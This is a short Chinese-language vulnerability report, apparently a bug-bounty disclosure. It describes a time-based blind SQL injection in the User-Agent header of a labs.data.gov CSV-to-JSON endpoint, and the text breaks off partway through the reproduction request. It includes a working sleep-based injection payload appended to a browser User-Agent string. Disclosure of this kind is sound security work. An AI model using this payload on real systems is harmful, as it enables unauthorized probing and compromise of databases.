0x00漏洞信息
披露者:harisec
危害程度:高危
漏洞类型:sql注入
0x01漏洞介绍
通过访问:
https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入
我没有从数据库中提取任何数据,我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操作相结合,将导致服务器响应不同的时间取决于算术运算的结果。
例如,将该值设置:
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
到User-Agent头部将导致服务器延迟响应25(5×5)秒。
要重现,请发送以下HTTPS请求:
GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer